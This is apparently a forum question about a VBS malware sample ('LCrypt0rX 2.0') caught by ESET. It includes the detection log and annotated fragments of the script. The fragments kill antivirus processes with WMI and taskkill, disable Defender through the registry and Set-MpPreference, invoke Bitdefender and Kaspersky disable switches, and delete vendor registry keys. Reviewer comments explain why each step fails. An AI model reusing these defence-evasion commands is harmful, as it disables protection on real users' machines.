ESET（essp）在压缩包解压后立即查杀，日志记录如下（事件发生在 WinRAR.exe 写出文件的那一刻，即文件落地即被删除，脚本并未执行）：
2025/10/4 17:44:21;文件系统实时防护;文件;C:\Users\Y8219\Downloads\LCrypt0rX 2.0\LCrypt0rX 2.0.vbs;VBS/Agent.TAO 特洛伊木马;已通过删除清除;FIREFLY\Y8219;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (4B95046B78C08FF2048F9CCD4186BC8BBDC0BFEF).;77018033AACAC7A80D79076EDAB61DE89B6D9AB2;2025/10/4 17:44:12;;

问题：下面这种代码能直接关掉杀软吗？（以下为该 VBS 样本的片段）
' 第一次终止防护进程
' Pass 1: terminate protection processes via WMI.
' NOTE(review): as pasted this fragment is not runnable. The "..." inside the
' Array literal is a placeholder, not VBScript, and the WQL string below has
' its quotes doubled (""), so VBScript parses the whole argument as ONE
' literal:   Select * from Win32_Process where Name=" & procName & "
' procName is never concatenated and the query matches nothing. The doubled
' quotes look like the line was lifted out of a WriteLine/string context
' elsewhere in the script (compare the WriteLine lines further down).
' NOTE(review): objWMI is not created in the visible code; presumably a
' winmgmts: object obtained earlier -- confirm from the full script.
' Security assessment: even a corrected version needs an elevated session to
' terminate a service process, and MsMpEng.exe runs as a protected process
' (PPL), so Win32_Process.Terminate returns Access Denied even as admin.
' The product that produced the detection on this page (ESET) protects its
' own service process with self-defense in the same way. This loop does not
' "directly kill" a current AV.
arrProcesses = Array("MsMpEng.exe", ...) ' MsMpEng.exe is the Windows Defender engine process
For Each procName In arrProcesses
For Each proc In objWMI.ExecQuery("Select * from Win32_Process where Name="" & procName & """)
proc.Terminate ' force-terminate the process
Next
Next
' Later the script keeps re-killing these in a loop (to stop the AV from
' restarting).
' NOTE(review): nothing here executes directly -- each line is written as
' TEXT into a TextStream held in advapi32_ext, i.e. these are lines of a
' second-stage script being dropped (the code that opens that stream, and
' the WshShell object the generated script would need, are not in this
' paste). Each written line becomes:  WshShell.Run "taskkill /IM X /F", 0, True
' taskkill /F is a plain TerminateProcess call, so it fails against
' PPL/self-protected AV services exactly like the WMI loop above; looping
' it only adds noise that EDR process-creation telemetry picks up.
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM MsMpEng.exe /F"", 0, True" ' Windows Defender
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM avp.exe /F"", 0, True" ' Kaspersky
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM AvastSvc.exe /F"", 0, True" ' Avast
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM avgsvc.exe /F"", 0, True" ' AVG
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM NortonSecurity.exe /F"", 0, True" ' Norton
' ... other AV processes elided in the paste ...   ' Next: disable Windows Defender real-time protection
' Disable Defender by policy registry value (DisableAntiSpyware = 1).
' NOTE(review): the HKLM write needs an elevated process; without it
' RegWrite raises a permission error. On current Defender builds Microsoft
' has discontinued this policy on client SKUs and it is ignored, and with
' Tamper Protection on the value is reverted/blocked anyway. The HKCU copy
' is not a policy location Defender reads -- presumably cargo-culted; it has
' no effect as far as I can tell.
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
' Then try to turn off real-time monitoring through PowerShell.
' NOTE(review): Set-MpPreference -DisableRealtimeMonitoring also requires
' elevation and is one of the settings Tamper Protection explicitly blocks
' from being changed by scripts; spawning powershell.exe from a .vbs with a
' hidden window (window style 0) is itself a common detection trigger.
' The trailing comment on the next line belongs to the Bitdefender line after it.
objShell.Run "powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true", 0, True ' (comment misplaced in paste: "disable Bitdefender")
' Disable Bitdefender via a hard-coded install path and a "-disable" switch.
' NOTE(review): the path is hard-coded to one product/version folder; whether
' bdnserv.exe accepts such a switch from an unauthenticated caller cannot be
' verified from this page -- Bitdefender's self-protection normally blocks
' this class of change. objShell is a different object name from WshShell
' above, so these fragments likely come from different scopes of the script.
objShell.Run "cmd /c ""C:\Program Files\Bitdefender\Bitdefender 2025\bdnserv.exe"" -disable", 0, True
' Disable Kaspersky via a hard-coded install path and avp.com.
' NOTE(review): avp.com normally requires the product's administration
' password for stop/exit-type commands when one is set, and "disable" is not
' a switch I can confirm from this page -- treat as best-effort at most.
' NOTE(review): in the paste the header  Sub DeleteAVRegistry(sh)  was glued
' onto the end of this Run line. VBScript will not parse that; in the real
' script the Sub starts on its own line. Kept as pasted here.
objShell.Run "cmd /c ""C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2025\avp.com"" disable", 0, True Sub DeleteAVRegistry(sh)
' DeleteAVRegistry(sh): for each vendor name, attempt to delete
' HKLM\SOFTWARE\<vendor> and HKCU\SOFTWARE\<vendor> using the WshShell
' object passed in as sh. Errors are suppressed, so it never reports success
' or failure.
' NOTE(review): three reasons this does not work as intended:
'  1. """" is a one-character string containing a double quote, so the path
'     handed to RegDelete is  HKLM\SOFTWARE\Kaspersky"  (stray trailing quote).
'  2. WshShell.RegDelete deletes a KEY only when the path ends in a backslash;
'     without it the name is treated as a VALUE, which does not exist here.
'  3. The HKLM delete needs elevation, and a running AV's self-protection
'     blocks edits to its own keys regardless. Removing a vendor's SOFTWARE
'     key would not stop its service anyway; it mostly holds configuration.
Dim avKeys, key
avKeys = Array("Kaspersky","Bitdefender","Avast","AVG","Norton","ESET") ' mainstream AV vendors
For Each key In avKeys
' On Error Resume Next inside the loop is redundant after the first
' iteration (it stays in effect for the rest of the Sub) and swallows
' every RegDelete failure silently.
On Error Resume Next
' Delete the machine-level and user-level vendor registry keys
sh.RegDelete "HKLM\SOFTWARE\" & key & """"
sh.RegDelete "HKCU\SOFTWARE\" & key & """"
Next
End Sub